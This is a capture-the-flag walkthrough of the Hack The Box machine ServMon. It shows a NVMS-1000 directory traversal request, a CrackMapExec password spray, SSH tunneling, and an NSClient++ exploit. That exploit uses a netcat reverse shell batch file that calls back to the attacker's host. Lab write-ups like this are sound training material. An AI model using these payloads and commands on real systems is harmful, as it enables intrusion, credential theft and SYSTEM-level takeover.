Hack The Box - ServMon

HackTheBox - ServMon

ServMon starts with FTP anonymous access that allows me to read the users' notes. One of these notes contains a hint to a location of a password list in one of the user’s dekstops. This machine hosts a NVMS-1000 which is vulnerable to path traversal attack and is exploited to obtain the password list. With a password spray attack, I’m able to gain a foothold on the system . Inside the machine, there is a config file of NSClient++, in which it contains a set of credentials. With these credentials, I can use public exploits for NSClient++ and gain interactive shell access as NT Authority\System.

Skills Learned

  • Directory/Path Traversal
  • NVMS-1000 exploitation
  • NSClient- exploitation
  • Port Forwarding/Tunneling




→ root@iamf «servmon» «»
$ nmap -sC -sV -oA nmap/initial-servmon ''
21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp   open  http
| fingerprint-strings: 
|   GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo: 
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|     </html>
|   NULL: 
|     HTTP/1.1 408 Request Timeout
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|_    AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
5666/tcp open  tcpwrapped
6699/tcp open  napster?
8443/tcp open  ssl/https-alt
| fingerprint-strings: 
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest: 
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|_    refox/68.0
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -28s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-04-12T16:27:15
|_  start_date: N/A

RPC (135), NetBIOS (139), and SMB (445) are the known ports for Windows box. Besides these standard ports, there are some interesting services installed on the box:

  • FTP with anonymous login on port 21,
  • SSH service on port 22
  • HTTPS service on non-standard port 8443.

This machine probably is not an Active Directory.


TCP 21 - FTP

21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users

Based on nmap scans, the FTP root directory contains the Users folder. Inside the Users folder, I found two subfolders, one is Nathan and the other is Nadine. Both of these users' folders contain a text file, I copied these files to my machine.

The first file is Confidential.txt. It contains a note from Nadine to Nathan.


I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.



The second file is Notes to do.txt. It contains a to do list.

1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

I’ll note that there’s a Password.txt text on Nathan’s desktop and the uncompleted to do.

TCP 445 - SMB

Anonymous login is not allowed, so nothing to see here.

TCP 80 - Website

Visiting port 80 redirects me to a login page on Pages/login.htm


Based on Google, NVSMS-1000 is a software for CCTV monitoring. I don’t find the default credentials, and it doesn’t seem to work with common credentials.


A quick search on exploit-db shows it is vulnerable to Directory Traversal.

PoC: https://www.exploit-db.com/exploits/47774

# Title: NVMS-1000 - Directory Traversal
# Date: 2019-12-12
# Author: Numan Türle
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html


GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close


; for 16-bit app support
[mci extensions]

There’s no version is specified, but I’ll give it a try.

TCP 8443 - NSClient++



It took ages to load every page on this site. A quick search on Google shows that NSClient++ is another monitoring software. Adding ‘exploit’ to the keyword pops up an exploit link that refers to exploit-DB:


Shell as nadine

I’ve added htb.servmon to my /etc/hosts, so it will resolve to I know htb.servmon looks weird, but that’s me in the past hehe..

NVMS-1000 Directory Traversal - Obtain Passwords.txt

I started BurpSuite and performed directory traversal based on the PoC above against NVMS-1000


It returns a list of passwords


Password spraying

I created a usernames list and a password list:

  • users.txt

  • passwords.txt


With these, a password spray can be performed using CrackMapExec. It hits on nadine:L1k3B1gBut7s@W0rk pair.

→ root@iamf «servmon» «»
$ crackmapexec smb htb.servmon -u users -p passwords
SMB    445    SERVMON          [+] SERVMON\nadine:L1k3B1gBut7s@W0rk 

SSH access

The credentials also work on SSH.

→ root@iamf «servmon» «»
$ ssh nadine@htb.servmon


Privilege Escalation

Shell as SYSTEM

Obtain NSClient++ password

3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

Recall the to do list from previous enumeration, I discovered a password for NSClient++ in its default installation folder.

PS C:\> gc 'Program Files\NSClient++\nsclient.ini'


I’ll try the scripted PoC. But before that, I’ll need to tunnel the connection first. This is because the config file is set to local only, so I can’t perform exploit directly from outside.

SSH Tunneling

SSH has tunneling features which allow me to access ServMon localhost and port from my localhost and specified port. For this, I’ll create another SSH connection for tunneling.

→ root@iamf «servmon» «»
$ ssh -L 8443: nadine@ 

-L 8443: means it will forward any connection on my localhost port 8443 to remote localhost on port 8443. In this case, ServMon is the remote. Now I can perform exploitation.

NSClient++ Exploit PoC

First, I’ll create a batch, called sans.bat file on my machine.

@echo off

C:\Temp\nc.exe 443 -e powershell.exe

Once it created, I’ll transfer the file to ServMon on C:\temp\ via python http server along with netcat for windows.

→ root@iamf «servmon» «»
$ Python -m SimpleHTTPServer 80

Get the hosted files on ServMon

PS C:\> Invoke-webrequest -uri -outfile C:/temp/reverse.bat
PS C:\> Invoke-webrequest -uri -outfile C:/temp/nc.exe

Now I’ll setup a listener on my Kali.

→ root@iamf «servmon» «»
$ nc -nlvvp 443

Then I can just run the exploit and wait on my listener.

→ root@iamf «servmon» «»
$ python3 nsRCE.py -t -P 8443 -p 'ew2x6SsGTxjRwXOT' -c "c:\temp\reverse.bat"

Now I have an interactive shell as NT Authority\SYSTEM.